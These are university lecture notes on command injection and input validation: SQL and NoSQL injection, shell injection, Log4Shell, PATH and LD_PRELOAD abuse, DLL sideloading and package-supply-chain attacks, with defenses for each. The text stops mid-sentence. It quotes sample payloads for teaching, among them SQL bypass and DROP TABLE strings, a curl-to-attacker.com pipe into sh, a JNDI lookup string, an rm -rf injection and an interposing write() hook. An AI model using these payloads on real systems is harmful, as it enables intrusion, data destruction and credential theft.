pk.org: Computer Security/Lecture Notes

Command Injection and Input Validation Attacks

From SQL injection to supply chain compromise

Paul Krzyzanowski – 2025-10-24

Introduction

Memory vulnerabilities like buffer overflows and use-after-free bugs allow attackers to corrupt a program's memory and hijack control flow. Command injection attacks achieve similar control but through a different mechanism: they exploit how programs construct and execute commands from user input.

When a program incorporates untrusted input into a command string—whether for a database query, a shell command, or a system call—an attacker can inject additional instructions that the interpreter will execute. Instead of overwriting memory to change what code runs, the attacker crafts input that changes what command runs.

Command injection is broader than memory corruption. It includes:

  • SQL and NoSQL injection against database queries

  • Shell command injection through system(), popen(), and similar interfaces

  • Environment variable and shared library attacks that change what code a program loads

  • Package manager and dependency attacks that compromise the software supply chain

These attacks succeed because programs often trust user input when building commands. Proper input validation and safer APIs prevent most injection vulnerabilities, but subtle parsing behaviors and comprehension errors continue to create opportunities for attackers.


SQL Injection

SQL injection is the most common and most exploited form of command injection. It occurs when user input becomes part of a database query without proper validation.

How SQL injection works

Many applications take user input and incorporate it directly into an SQL query. Consider a simple login check:

sprintf(buf,
    "SELECT * FROM logininfo WHERE username = '%s' AND password = '%s';",
    uname, passwd);

This code creates a query by inserting the user-supplied username and password into a string. If the query returns results, the user is authenticated.

Now suppose an attacker enters this as a password:

' OR 1=1 ; --

The resulting query becomes:

SELECT * FROM logininfo WHERE username = 'paul' AND password = '' OR 1=1 ; -- ';

The -- begins an SQL comment, telling the database to ignore everything after it. In SQL, AND has higher precedence than OR, so the query evaluates as (username='paul' AND password='') OR (1=1). Since 1=1 is always true, the OR condition makes the entire expression true regardless of whether the AND portion succeeds.

The WHERE clause is satisfied for every row regardless of the actual password. The attacker has bypassed authentication entirely.
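The vulnerable construction is easy to reproduce. Here is a short Python sketch of the same string-building pattern as the sprintf() call above (the function name is illustrative):

```python
# Vulnerable: user input is spliced directly into the SQL text,
# mirroring the sprintf() example above.
def build_login_query(uname, passwd):
    return (f"SELECT * FROM logininfo WHERE "
            f"username = '{uname}' AND password = '{passwd}';")

query = build_login_query("paul", "' OR 1=1 ; --")
print(query)
# SELECT * FROM logininfo WHERE username = 'paul' AND password = '' OR 1=1 ; --';
```

The attacker never touched the username field; the password alone was enough to rewrite the query's logic.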

More destructive attacks

Authentication bypass is just one possibility. An attacker can use semicolons to chain multiple SQL statements:

'; DROP TABLE users; --

This transforms a simple lookup into a command that deletes an entire table. SQL injection can:

  • Read data the application never intended to expose, including other users' records

  • Modify or delete data, corrupting or destroying the database

  • Execute administrative operations, such as shutting down the database server

  • In some configurations, read or write files and issue commands to the operating system

Why SQL injection persists

SQL injection has been well understood since the late 1990s, yet it remains one of the most common vulnerabilities. Several factors contribute to this:

String concatenation is intuitive: Building queries by concatenating strings feels natural to programmers and works correctly in normal cases. The problem only manifests when input contains SQL syntax.

Escaping is error-prone: Attempting to clean up input by escaping special characters is difficult. Different database systems have different quoting rules. A backslash might escape a quote in MySQL but not in PostgreSQL. Single quotes might need doubling in some systems. Programmers often implement incomplete or incorrect escaping.

Validation is insufficient: Checking for dangerous characters like quotes or semicolons seems reasonable but fails in subtle ways. Legitimate passwords or names may contain these characters. Different character encodings complicate detection. Attackers find clever encodings that bypass filters but execute as valid SQL.

Defenses against SQL injection

The most reliable defense is to avoid incorporating user input into the query structure itself.

Parameterized queries

A parameterized query separates the SQL command structure from the data values. The database receives these separately and never interprets data as SQL syntax.

uname = getResourceString("username");
passwd = getResourceString("password");
query = "SELECT * FROM users WHERE username = @0 AND password = @1";
db.Execute(query, uname, passwd);

The @0 and @1 markers are placeholders. The database knows these positions hold data values, not SQL code. Even if a password contains ' OR 1=1 --, the database treats it as a literal string, not as SQL syntax. The query structure cannot be altered.

Modern database libraries provide parameterized query interfaces in nearly every programming language. They eliminate SQL injection at the API level and should always be used when incorporating user input into queries.
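The same login check written with Python's built-in sqlite3 module shows the effect; the table and credentials here are illustrative:

```python
import sqlite3

# In-memory database with one account (illustrative schema and data)
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('paul', 'secret')")

def check_login(uname, passwd):
    # ? placeholders: the driver sends values separately from the SQL text,
    # so they can never be parsed as SQL syntax.
    cur = db.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (uname, passwd))
    return cur.fetchone() is not None

assert check_login("paul", "secret")           # real credentials work
assert not check_login("paul", "' OR 1=1 --")  # injection is just a wrong password
```

The payload that defeated the concatenated query is now compared, byte for byte, against the stored password and simply fails to match.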

Stored procedures

Stored procedures are predefined SQL functions that live in the database. They accept parameters but the SQL structure is fixed. Calling a stored procedure with user input has the same protective property as parameterized queries: the input is treated as data, never as code.

CREATE PROCEDURE CheckLogin(@username VARCHAR(50), @password VARCHAR(50))
AS
BEGIN
    SELECT * FROM users WHERE username = @username AND password = @password;
END

The application calls this procedure with username and password parameters. The SQL structure is immutable.

Input validation as a secondary defense

Parameterized queries and stored procedures are the primary defense. Input validation and sanitization add a second layer but cannot be the only protection.

Validation approaches

Allowlisting (whitelisting): Define what input is acceptable and reject everything else. This is the safest validation approach because it denies by default.

Example: If a field should only contain alphanumeric characters and hyphens:

import re
if not re.match(r'^[a-zA-Z0-9-]+$', user_input):
    raise ValueError("invalid input")  # reject everything else
# input is valid past this point

Denylisting (blacklisting): Define what input is unacceptable and reject those patterns. This is less safe because attackers often find bypasses through encoding, alternate syntax, or patterns not on the denylist.

Example: Attempting to block SQL injection by rejecting quotes and semicolons:

if "'" in user_input or ";" in user_input:
    raise ValueError("invalid input")  # reject input

This approach fails against encoded attacks, legitimate uses of these characters, and other SQL syntax not covered by the denylist.
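A concrete failure: an injection in a numeric context needs neither quotes nor semicolons, so the denylist above passes it untouched. A minimal Python sketch (names are illustrative):

```python
# The denylist check from above: reject quotes and semicolons.
def passes_denylist(user_input):
    return "'" not in user_input and ";" not in user_input

# A numeric-context payload contains neither character.
payload = "1 OR 1=1"
assert passes_denylist(payload)  # the filter lets it through

# Spliced into an unquoted numeric WHERE clause, it still rewrites the logic.
query = f"SELECT * FROM users WHERE id = {payload}"
print(query)  # SELECT * FROM users WHERE id = 1 OR 1=1
```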

Sanitization techniques

When you must work with potentially dangerous input, sanitization modifies the input to make it safe.

Escaping special characters: Add escape sequences to neutralize characters that have special meaning. Different contexts require different escaping rules.

For SQL contexts, database libraries may provide escaping functions, but these are complex and error-prone:


# Example concept (implementation varies by database)

# Single quotes in SQL are typically escaped by doubling them
escaped = user_input.replace("'", "''")
query = f"SELECT * FROM users WHERE name = '{escaped}'"

# Still vulnerable to many attacks - parameterized queries are much safer

Critical limitations of SQL escaping:

  • Quoting rules differ across database systems, so escaping code is not portable

  • Numeric and identifier contexts take no quotes at all, so quote escaping does not protect them

  • Alternate character encodings can smuggle quote characters past the escaping logic

  • One missed code path is enough to leave the application exploitable

Always prefer parameterized queries over any form of escaping.

Removing or replacing characters: Strip out or substitute dangerous characters entirely.


# Remove all non-alphanumeric characters
sanitized = re.sub(r'[^a-zA-Z0-9]', '', user_input)

General validation guidelines

Validation should:

  • Run on the server, where an attacker cannot bypass it

  • Operate on input after it has been decoded into its final form

  • Check type, length, format, and range against an allowlist of acceptable values

  • Reject invalid input outright rather than attempt to repair it

Validation and sanitization catch mistakes and malformed input, but they should not be relied upon to stop SQL injection. Subtle bypasses and encoding issues make them unreliable as the sole defense.

Real-world SQL injection

SQL injection remains actively exploited. A June 2024 vulnerability in Fortra FileCatalyst Workflow, a file transfer application, allowed anonymous remote attackers to inject SQL through a jobID parameter used in a WHERE clause. The application built queries by concatenating user input without validation or parameterization.

SQL injection is not just a web application problem. Desktop applications, mobile apps, and embedded systems that interact with databases are all vulnerable if they construct queries from untrusted input.

Second-order SQL injection

A subtler variant is second-order SQL injection, where malicious input is stored in the database and later retrieved and used in another query without proper handling.

The attack unfolds in stages:

  1. Attacker submits malicious input that gets stored in the database

  2. The initial storage operation may properly escape the input

  3. Later, the application retrieves this data and uses it in a different query

  4. The second query treats the retrieved data as trusted and doesn't escape it

  5. The stored malicious SQL executes in the new context

For example:

Stage 1: The attacker registers an account with the username admin'--. The registration code escapes the input correctly, so the literal string is stored in the database.

Stage 2: Later, a password-change feature retrieves the stored username and concatenates it into a new query:

    UPDATE users SET password='newpass' WHERE username='admin'--'

The -- comments out the trailing quote, and the query changes the admin account's password instead of the attacker's.

A more dangerous example involves privilege escalation:

  1. The attacker sets their display name to: x', role='admin' --

  2. The value is stored safely, as an ordinary string

  3. Later, the application re-saves the profile, concatenating the stored display name into the query:

    UPDATE users SET display_name='x', role='admin' --' WHERE username='attacker'

  4. The injected role='admin' assignment executes, and the -- comments out the WHERE clause, elevating the attacker's privileges

Defense: Treat ALL data as untrusted, even data retrieved from your own database. Always use parameterized queries regardless of data source. Never assume that because data came from your database, it's safe to use in SQL construction.
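The staged attack can be reproduced end to end with Python's built-in sqlite3 module. The schema, account names, and display-name payload below are illustrative; the second query deliberately repeats the unsafe concatenation:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, display_name TEXT, role TEXT)")

# Stage 1: the malicious display name is stored SAFELY via a parameterized query.
evil_name = "x', role='admin' --"
db.execute("INSERT INTO users VALUES (?, ?, ?)", ("attacker", evil_name, "user"))

# Stage 2: later, the application re-saves the profile, trusting its own
# database and concatenating the stored value into a new UPDATE statement.
(stored_name,) = db.execute(
    "SELECT display_name FROM users WHERE username='attacker'").fetchone()
db.execute(f"UPDATE users SET display_name='{stored_name}' "
           f"WHERE username='attacker'")

# The injected role='admin' executed; the -- commented out the WHERE clause.
(role,) = db.execute(
    "SELECT role FROM users WHERE username='attacker'").fetchone()
assert role == "admin"
```

The first query did everything right; the vulnerability lives entirely in the second one.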


NoSQL Injection

NoSQL databases like MongoDB, CouchDB, and Redis use different query languages but are equally vulnerable to injection attacks. The injection mechanisms differ from SQL but the fundamental problem remains: mixing code and data.

MongoDB injection

MongoDB queries often use JSON-like structures. Consider this Node.js authentication code:

db.users.findOne({
    username: req.body.username,
    password: req.body.password
});

If the application passes user input directly from HTTP request body to the query, an attacker can send JSON objects instead of strings:

{
    "username": "admin",
    "password": { "$ne": null }
}

The $ne (not equal) operator makes the query check if the password is not null, which is always true for existing users. The attacker bypasses authentication without knowing the password.

MongoDB operator injection

MongoDB's query operators provide powerful injection vectors:

// Attacker input: { "$gt": "" }
// Query becomes: find all users where password is greater than empty string
db.users.findOne({ username: "admin", password: { "$gt": "" } });

// Attacker input: { "$regex": "^a" }
// Query becomes: find users whose password starts with 'a'
// Attacker can enumerate passwords character by character
db.users.findOne({ username: "admin", password: { "$regex": "^a" } });

JavaScript injection in MongoDB

Some MongoDB operations accept JavaScript code:

db.users.find({ "$where": "this.username == '" + username + "'" });

An attacker can inject arbitrary JavaScript:

username: "'; return true; //"

Resulting query:

db.users.find({ "$where": "this.username == ''; return true; //'" });

This returns all users regardless of username.

Defenses against NoSQL injection

Validate input types: Ensure strings are strings, not objects. Reject any input that contains MongoDB operators:

if (typeof req.body.username !== 'string' || typeof req.body.password !== 'string') {
    return res.status(400).send('Invalid input');
}

Use schema validation: Libraries like Mongoose provide type checking and validation:

const userSchema = new mongoose.Schema({
    username: { type: String, required: true },
    password: { type: String, required: true }
});

Avoid $where operator: The $where operator executes JavaScript and should never be used with user input. Prefer standard query operators.

Use allowlists for operators: If your application needs to support query operators from user input (such as search filters), explicitly allowlist which operators are permitted and validate their usage.

Cast to expected types: Explicitly convert input to expected types:

const username = String(req.body.username);
const password = String(req.body.password);

NoSQL injection demonstrates that injection vulnerabilities transcend specific database technologies. Any system that interprets user input as commands or operators is vulnerable.


Shell Command Injection

Shell command injection occurs when a program passes user-controlled input to a command interpreter. Unix-like shells—the standard shells on Linux, macOS, and Unix systems (sh, bash, zsh)—and Windows cmd.exe provide powerful command composition features that attackers can exploit.

The system() and popen() functions

The C standard library provides system() and popen() to execute shell commands. These functions pass their argument to a shell, which interprets it as a command.

system("/usr/bin/ls /home/user");

This spawns a shell that executes the ls command. The shell interprets special characters, expands variables, and handles redirection and pipes.

Consider a program that sends email alerts:

char command[BUFSIZE];
snprintf(command, BUFSIZE, "/usr/bin/mail -s \"alert\" %s", user);
FILE *fp = popen(command, "w");

If the user variable comes from untrusted input, an attacker can inject shell commands. Entering:

nobody; rm -rf /home/*

produces:

/usr/bin/mail -s "alert" nobody; rm -rf /home/*

The semicolon terminates the mail command and starts a new command. The shell executes both: first it mails nobody, then it deletes all user directories.

Shell metacharacters

Shells interpret many characters as special:

Character     Purpose
;             Command separator
&             Background execution
|             Pipe output to another command
&&            Execute second command if first succeeds
||            Execute second command if first fails
$() or `      Command substitution
> and <       Redirection
* and ?       Filename wildcards

An attacker who controls any part of a string passed to a shell can use these to inject arbitrary commands.

Command substitution is particularly powerful. The sequence:

$(malicious_command)

executes malicious_command and substitutes its output into the command line. An attacker might inject:

user@example.com $(curl http://attacker.com/malware.sh | sh)

This downloads and executes a script from the attacker's server.

Real-world command injection

A February 2024 vulnerability in Fortinet's FortiSIEM security tool allowed attackers to exploit a Python script that called os.system() with a user-controlled mount_point value. An attacker could inject a semicolon followed by any command, which the application would execute with root privileges.

Remarkably, this was the second command injection vulnerability in the same product within six months. The earlier vulnerability used the same technique: concatenating user input into a shell command.

Defenses against shell command injection

Avoid shells entirely

The safest defense is to avoid shells when executing external programs. Use APIs that execute programs directly without shell interpretation:

  • The exec family (execve(), execv(), and relatives) or posix_spawn() in C on Unix-like systems

  • subprocess.run() with an argument list in Python

  • execFile() or spawn() in Node.js

  • ProcessBuilder in Java

These interfaces take the program path and arguments as separate parameters. The operating system executes the program directly. There is no shell to interpret special characters.

Example using execve():

extern char **environ;  // Declare environment variable array
char *args[] = {"/usr/bin/mail", "-s", "alert", user, NULL};
execve("/usr/bin/mail", args, environ);  // Replaces this process image; fork() first if the caller must continue

The username is passed as a separate argument. Even if it contains semicolons or other shell metacharacters, they are treated as literal characters in the argument, not as shell syntax.

Input validation and sanitization

When shell use is unavoidable, combine validation and sanitization as defense-in-depth measures.

Allowlist validation

The safest approach is to accept only explicitly permitted characters or patterns. For example, if expecting a hostname for a ping command:

import re

# Only allow alphanumeric, dots, and hyphens
if re.match(r'^[a-zA-Z0-9.-]+$', user_host):
    os.system(f"ping {user_host}")
else:
    return "Invalid hostname"

This rejects any input containing shell metacharacters like semicolons, pipes, or command substitution syntax. Only hostnames matching the expected pattern are accepted.

Sanitization through escaping

If you must accept a broader range of input, use proper escaping to neutralize special characters. Python's shlex module provides reliable shell escaping:

import shlex
safe_input = shlex.quote(user_input)  # Adds proper escapes
os.system(f"command {safe_input}")

The shlex.quote() function returns a shell-escaped version of the string, typically by wrapping it in single quotes. Each embedded single quote is replaced with the five-character sequence '"'"' (close the quotes, emit the quote character inside double quotes, then reopen), so the quote passes through literally and no metacharacters reach the shell.
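The behavior is easy to verify directly:

```python
import shlex

# Strings with no special characters pass through unchanged.
assert shlex.quote("hello") == "hello"

# Metacharacters are neutralized by wrapping the string in single quotes.
assert shlex.quote("foo; rm -rf /") == "'foo; rm -rf /'"

# An embedded single quote becomes '"'"' : close the quotes,
# emit a double-quoted quote character, then reopen.
assert shlex.quote("it's") == "'it'\"'\"'s'"
```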

Combining validation and sanitization

For maximum safety, combine both approaches:

import re
import shlex

# First validate: only allow expected characters
if not re.match(r'^[a-zA-Z0-9._-]+$', user_filename):
    return "Invalid filename"

# Then sanitize as additional protection
safe_filename = shlex.quote(user_filename)
os.system(f"process_file {safe_filename}")

Important limitations

Input validation and sanitization alone are not reliable primary defenses:

  • Denylists miss alternate encodings and metacharacters the developer did not anticipate

  • Escaping rules differ between shells and platforms and are easy to get subtly wrong

  • Validation that is too strict tends to be loosened over time, reopening the hole

  • A single unvalidated code path is all an attacker needs

These techniques should be secondary defenses. The primary defense is to avoid shells entirely by using APIs that execute programs directly.

Principle of least privilege

Run programs with the minimum privileges necessary. If a web application is compromised through command injection, running it as an unprivileged user limits the damage an attacker can cause. A command injection vulnerability in a root process can compromise the entire system. The same vulnerability in an unprivileged process may only compromise that process.

Language-specific injection risks

Modern programming languages provide their own command execution mechanisms, each with specific security considerations. Understanding language-specific pitfalls helps developers choose safe alternatives.

JavaScript and Node.js

eval() and Function() constructor: These functions execute arbitrary JavaScript code and should never be used with user input:

// DANGEROUS: Executes arbitrary code
eval(userInput);
new Function(userInput)();

// SAFE: Use JSON.parse() for parsing data structures
const data = JSON.parse(userInput);

child_process module: Node.js provides several ways to execute external programs. The safe and unsafe variants differ in whether they invoke a shell:

const { exec, execFile } = require('child_process');

// DANGEROUS: Invokes shell, interprets metacharacters
exec(`convert ${userFile} output.png`);

// SAFE: No shell, arguments passed directly to program
execFile('convert', [userFile, 'output.png']);

The spawn() function is also safe when used without the shell: true option.

Python

eval() and exec(): These functions execute Python code and must never receive untrusted input:


# DANGEROUS: Executes arbitrary Python code
eval(user_input)
exec(user_code)

# SAFE: Use ast.literal_eval() for parsing Python literals
import ast
data = ast.literal_eval(user_input)  # Only parses literals, not code

subprocess module: The subprocess module provides several functions. Always use shell=False (which is the default):

import subprocess

# DANGEROUS: shell=True enables shell interpretation
subprocess.run(f"ls {user_dir}", shell=True)

# SAFE: Arguments passed as list, no shell
subprocess.run(["ls", user_dir])  # shell=False is default

The subprocess.run() function with a list of arguments is the modern, safe approach. Older functions like os.system() and os.popen() should be avoided entirely.

Java

Runtime.exec(): Java's Runtime.exec() does not invoke a shell by default, but developers must use it correctly:

// DANGEROUS: the single string is split naively, and cmd.exe /c passes the rest to the shell
Runtime.getRuntime().exec("cmd.exe /c dir " + userDir);

// SAFER: an arguments array avoids naive splitting, though cmd.exe still
// parses its own metacharacters; avoid invoking a shell at all when possible
Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "dir", userDir});

ProcessBuilder: The modern Java approach uses ProcessBuilder, which provides better control:

ProcessBuilder pb = new ProcessBuilder("convert", userFile, "output.png");
Process p = pb.start();

Expression Language injection: Java web applications using JSP or JSF can execute code through Expression Language:

<!-- DANGEROUS: User input in EL expression -->
Welcome ${param.username}

<!-- SAFE: Escape output -->
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %>
Welcome ${fn:escapeXml(param.username)}

PHP

PHP has numerous command execution functions that should be avoided with user input:

// DANGEROUS: All of these invoke shells
system($cmd);
exec($cmd);
shell_exec($cmd);
passthru($cmd);
`$cmd`;  // Backticks execute shell commands

// SAFER: Use escapeshellarg() and escapeshellcmd()
$safe_arg = escapeshellarg($user_input);
system("program $safe_arg");

// BEST: Avoid shell execution entirely, use language features

Common patterns

Across all languages, the safe pattern is consistent:

  1. Avoid code execution functions: Don't use eval(), exec(), or similar functions with user input

  2. Avoid shells: Use APIs that execute programs directly without shell interpretation

  3. Pass arguments separately: Provide command and arguments as separate parameters, not as a single string

  4. Validate input: Even with safe APIs, validate that input conforms to expectations

Log4Shell: A Case Study in Injection Vulnerabilities

In December 2021, a critical vulnerability in Log4j (CVE-2021-44228), nicknamed Log4Shell, demonstrated how injection vulnerabilities can exist in unexpected places, even logging libraries. With a CVSS score of 10.0, it became one of the most severe and widespread vulnerabilities ever disclosed.

Log4j is a Java logging library used in millions of applications worldwide. Versions 2.0 through 2.14.1 contained a feature that performed JNDI (Java Naming and Directory Interface) lookups when it encountered certain expressions in log messages. An attacker could trigger remote code execution simply by getting a malicious string logged:

// Vulnerable code - looks completely innocuous
logger.info("User {} logged in", username);

If username contained ${jndi:ldap://attacker.com/Exploit}, Log4j would:

  1. Parse the JNDI expression

  2. Connect to the attacker's LDAP server

  3. Download a Java class

  4. Execute it in the application's context

The attack surface was enormous because any user-controlled data that got logged—usernames, User-Agent headers, form inputs, error messages—could trigger the vulnerability. Attackers began mass exploitation within hours of disclosure, targeting everything from enterprise applications to Minecraft servers.

Log4Shell illustrates several critical lessons:

  • Injection vulnerabilities exist wherever user input is interpreted: This wasn't SQL or shell commands; it was a logging library dynamically interpreting expressions.

  • Convenient features can be security disasters: JNDI lookup in log messages seemed useful but created a massive attack surface.

  • Ubiquitous dependencies amplify risk: Because Log4j was everywhere, a single vulnerability affected millions of systems.

  • Input validation must consider all interpreters: Even "safe" operations like logging can execute code if the library interprets special syntax.

The proper defense is the same as for other injection attacks: never let user input control code execution. Later Log4j releases disabled JNDI lookups by default, but the incident shows that secure-by-default design should extend to all components, including those that seem benign.


Environment Variable Attacks

Programs inherit environment variables from their parent process. These variables control program behavior in ways that can be exploited.

PATH manipulation

The PATH variable determines where the shell searches for commands. Consider:

PATH=/home/paul/bin:/usr/local/bin:/usr/bin:/bin

When a user or script runs ls, the shell searches these directories in order until it finds an executable named ls.

If an attacker can modify PATH or write to a directory in PATH that appears before system directories, they can plant a malicious program that will be executed instead of the intended command.

For example, if /usr/local/bin is writable and appears early in PATH, an attacker can create /usr/local/bin/ls containing:

#!/bin/sh

# Steal credentials, establish backdoor, etc.
/bin/ls "$@"  # Run the real ls to avoid suspicion

Now any script or user that runs ls will first execute the attacker's code.

Mitigation: Ensure PATH contains only trusted directories. Scripts that run with elevated privileges should set PATH explicitly:

#!/bin/sh
PATH=/usr/bin:/bin
export PATH

This prevents inherited PATH values from redirecting commands to attacker-controlled locations.
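The same discipline applies when a program resolves command locations itself. A sketch using Python's shutil.which() with an explicit search path; the trusted directories shown are an assumption for Unix-like systems:

```python
import shutil

TRUSTED_PATH = "/usr/bin:/bin"  # explicit, trusted directories only

def trusted_lookup(cmd):
    """Resolve a command against a fixed PATH, ignoring the inherited one."""
    path = shutil.which(cmd, path=TRUSTED_PATH)
    if path is None:
        raise FileNotFoundError(cmd)
    return path

shell = trusted_lookup("sh")  # e.g. /bin/sh on most Unix-like systems
```

Because the lookup never consults os.environ["PATH"], a planted executable in an attacker-writable directory is never considered.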

ENV and BASH_ENV variables

Some shells execute a script file when starting a non-interactive shell. The ENV variable (in POSIX shells) or BASH_ENV variable (in bash) specifies this initialization file.

If an attacker can set these variables, arbitrary commands run at the start of every shell script. This affects system scripts, cron jobs, and any program that spawns a subshell.

Mitigation: Unset these variables in security-sensitive contexts or ensure they cannot be controlled by untrusted users.
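A defensive sketch in Python: scrub such variables from the environment before spawning children. The variable list here is illustrative, not exhaustive:

```python
import os
import subprocess

# Variables that can redirect shell startup files or dynamic library loading
# (an illustrative, not exhaustive, list).
DANGEROUS_VARS = ("ENV", "BASH_ENV", "LD_PRELOAD", "LD_LIBRARY_PATH")

def clean_environment():
    env = dict(os.environ)
    for var in DANGEROUS_VARS:
        env.pop(var, None)         # drop the variable if present
    env["PATH"] = "/usr/bin:/bin"  # pin PATH to trusted directories
    return env

# Children spawned with the scrubbed environment cannot be redirected this way.
subprocess.run(["/bin/sh", "-c", "true"], env=clean_environment(), check=True)
```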

Shared Library Hijacking

Shared libraries contain code that multiple programs use. The dynamic linker loads these libraries when programs start. Both Linux/Unix and Windows allow attackers to redirect programs to load malicious libraries instead of legitimate ones, though the mechanisms differ.

Linux/Unix: LD_PRELOAD and LD_LIBRARY_PATH

Two environment variables control library loading on Linux and Unix systems:

LD_LIBRARY_PATH: A colon-separated list of directories to search for shared libraries before system directories

LD_PRELOAD: A list of shared libraries to load before all others, allowing functions in these libraries to override standard library functions

How LD_PRELOAD works

Consider a program that generates random numbers:

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
    srand(time(NULL));
    for (int i = 0; i < 10; i++)
        printf("%d\n", rand() % 100);
    return 0;
}

An attacker can create a replacement rand() function:

int rand(void) {
    return 42;
}

Compile it as a shared library:

gcc -shared -fPIC rand.c -o fake_rand.so

Set LD_PRELOAD and run the program:

export LD_PRELOAD=$PWD/fake_rand.so
./random

Output:

42
42
42
42
...

The program now uses the attacker's rand() instead of the standard library version. The program's behavior has been changed without recompiling or modifying the executable.

Function interposition

The power of LD_PRELOAD comes from function interposition: the attacker's function can call the original function after modifying parameters or adding behavior. This is more sophisticated than simple replacement.

Example: Intercepting file writes to log sensitive data:

#define _GNU_SOURCE
#include <dlfcn.h>
#include <unistd.h>
#include <string.h>

// Pointer to the real write() function
ssize_t (*real_write)(int fd, const void *buf, size_t count) = NULL;

ssize_t write(int fd, const void *buf, size_t count) {
    // First call: get pointer to the real write()
    if (!real_write) {
        real_write = dlsym(RTLD_NEXT, "write");
    }

    // Log the data being written
    if (fd == 1 || fd == 2) {  // stdout or stderr
        real_write(2, "[INTERCEPTED] ", 14);
        real_write(2, buf, count);
    }

    // Call the real write() to maintain normal behavior
    return real_write(fd, buf, count);
}

This interposed write() logs all output while still allowing the program to function normally. The victim program never knows its behavior is being monitored.

RTLD_NEXT tells the dynamic linker to find the next occurrence of the symbol (the real write()) after the current library. This enables transparent wrapping of library functions.

Attack scenarios

LD_PRELOAD and LD_LIBRARY_PATH enable several attacks through function interposition:

  • Credential theft: intercept functions that handle passwords or keys and copy the data elsewhere

  • Surveillance: wrap read() and write() to log everything a program sends or receives

  • Security bypass: replace authentication or certificate-verification functions with versions that always succeed

  • Concealment: filter the results of directory-listing functions to hide malicious files, as rootkits do

Protection mechanisms

Operating systems protect against these attacks in setuid and setgid programs (programs that run with elevated privileges, such as root):

  • The dynamic linker ignores LD_LIBRARY_PATH and ignores or sharply restricts LD_PRELOAD when a program runs setuid or setgid

  • On Linux, the kernel signals this "secure execution" state to the loader through the AT_SECURE auxiliary vector entry

However, these variables still affect programs running with the user's own privileges, which can be enough for many attacks.

Windows: DLL Search Order Attacks

Windows uses Dynamic Link Libraries (DLLs) for shared code. Like Linux's LD_PRELOAD, Windows' DLL loading mechanism can be exploited, though it works differently.

When a program loads a DLL without specifying a full path, Windows searches several locations in order:

  1. The directory containing the executable

  2. The system directory (C:\Windows\System32)

  3. The Windows directory (C:\Windows)

  4. The current working directory

  5. Directories in the PATH environment variable

DLL sideloading

An attacker can exploit this search order by placing a malicious DLL in a directory that is searched before the legitimate DLL. This is called DLL sideloading or DLL hijacking.

Example: If an application loads crypto.dll without a full path, and an attacker places a malicious crypto.dll in the same directory as the executable, the application will load the attacker's version instead of the system version.

Legitimate use: DLL redirection

The same mechanism serves a legitimate purpose. Legacy applications that require specific DLL versions can have those versions placed in the application's directory. The application loads its local version while other programs use the system version. This solves compatibility problems without modifying system libraries.

Mitigation

Windows developers can defend against DLL sideloading:

  • Load libraries with full paths instead of bare names

  • Call SetDefaultDllDirectories() or SetDllDirectory("") to remove unsafe locations such as the current directory from the search order

  • Sign DLLs and verify signatures before loading

  • Keep SafeDllSearchMode enabled so system directories are searched before the current directory

Common principles across platforms

Both LD_PRELOAD on Linux/Unix and DLL sideloading on Windows exploit the same fundamental weakness: programs load libraries by name without verifying their source. The attacks differ in mechanism—environment variables versus search order—but the outcome is identical: an attacker's code runs with the program's privileges.

The legitimate uses also mirror each other: both mechanisms exist to solve compatibility problems by allowing applications to use specific library versions. This dual-use nature—supporting both compatibility and exploitation—makes these features difficult to remove or restrict entirely.

Defense requires similar approaches on both platforms: use full paths when loading libraries, restrict search paths, verify library authenticity through signatures, and limit privileges so that even if library loading is compromised, the damage is contained.


Package Manager and Dependency Attacks

Modern development relies heavily on package managers (npm for JavaScript, pip for Python, Maven for Java, RubyGems for Ruby, NuGet for .NET) and third-party libraries. This dependency ecosystem creates new injection vectors where malicious code enters through the supply chain rather than through application vulnerabilities.

Unlike traditional injection attacks that exploit how applications process input, package manager attacks compromise the development environment itself. Malicious code executes during package installation or when the application imports the package, often before developers realize anything is wrong.

Typosquatting attacks

Typosquatting exploits common typing mistakes by creating packages with names similar to popular libraries. When developers make typos in their dependency files or install commands, they may download malicious packages instead of legitimate ones.

Common typosquatting patterns

Character transposition: swapping adjacent letters, as in requets instead of requests

Missing or extra characters: reqests or requestss instead of requests

Separator variations: crossenv instead of cross-env, or python_dateutil instead of python-dateutil

Homoglyph attacks: Using visually similar Unicode characters, such as the Cyrillic "е" (U+0435) in place of the Latin "e", which render identically in many fonts
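Since names on mainstream registries such as PyPI and npm are plain ASCII, a simple first-line check is to flag any package name that is not. A minimal sketch:

```python
def looks_suspicious(package_name):
    # Registry names for mainstream ecosystems are ASCII; any non-ASCII
    # character is a likely homoglyph and worth flagging.
    return not package_name.isascii()

assert not looks_suspicious("requests")
# Cyrillic U+0435 looks like a Latin 'e' in many fonts:
assert looks_suspicious("r\u0435quests")
```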

Real-world typosquatting and package-compromise incidents

2017 PyPI attacks: Dozens of typosquat packages mimicking popular libraries (urllib, requests, setuptools) were discovered. They collected environment variables, SSH keys, and AWS credentials, sending them to attacker-controlled servers.

2019 RubyGems attack: The rest-client gem (downloaded millions of times) had a typosquat variant rest-client-stealth that installed cryptocurrency mining software.

2021 npm attack: Package ua-parser-js (8 million weekly downloads) was compromised when attackers gained access to the maintainer's account. Updated versions installed password stealers and cryptocurrency miners.

2022 Python ctx compromise: The ctx package was updated to steal AWS credentials after the original maintainer's account was hijacked. The package had been dormant for years before the malicious update.

2024 Python exfiltration campaign: Multiple packages discovered containing code that collected environment variables (AWS keys, database passwords, API tokens) and exfiltrated them to attacker servers during installation.

Dependency confusion

Dependency confusion exploits how package managers resolve dependencies when both public and private package repositories exist. This attack was first publicly demonstrated in 2021 and affected major technology companies.

How dependency confusion works

Many organizations maintain both private, internal-only packages (hosted on an internal repository) and dependencies pulled from public repositories such as npm or PyPI.

Package managers often consult public repositories alongside private ones, and many prefer whichever source offers the highest version number. An attacker can:

  1. Discover internal package names: Names leak through error messages, public GitHub repositories, bundled JavaScript files, or job postings

  2. Upload malicious packages to public repositories: Create packages with the same names as internal packages but with higher version numbers

  3. Wait for installation: Build systems or developers' machines fetch the malicious public package instead of the internal one
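The core failure in step 3 is the resolver's preference for the highest version. A toy model (package names and versions are hypothetical) shows how a naive "highest version wins" rule hands the win to the attacker's public upload:

```python
# Toy resolver: with a private and a public index both offering the same
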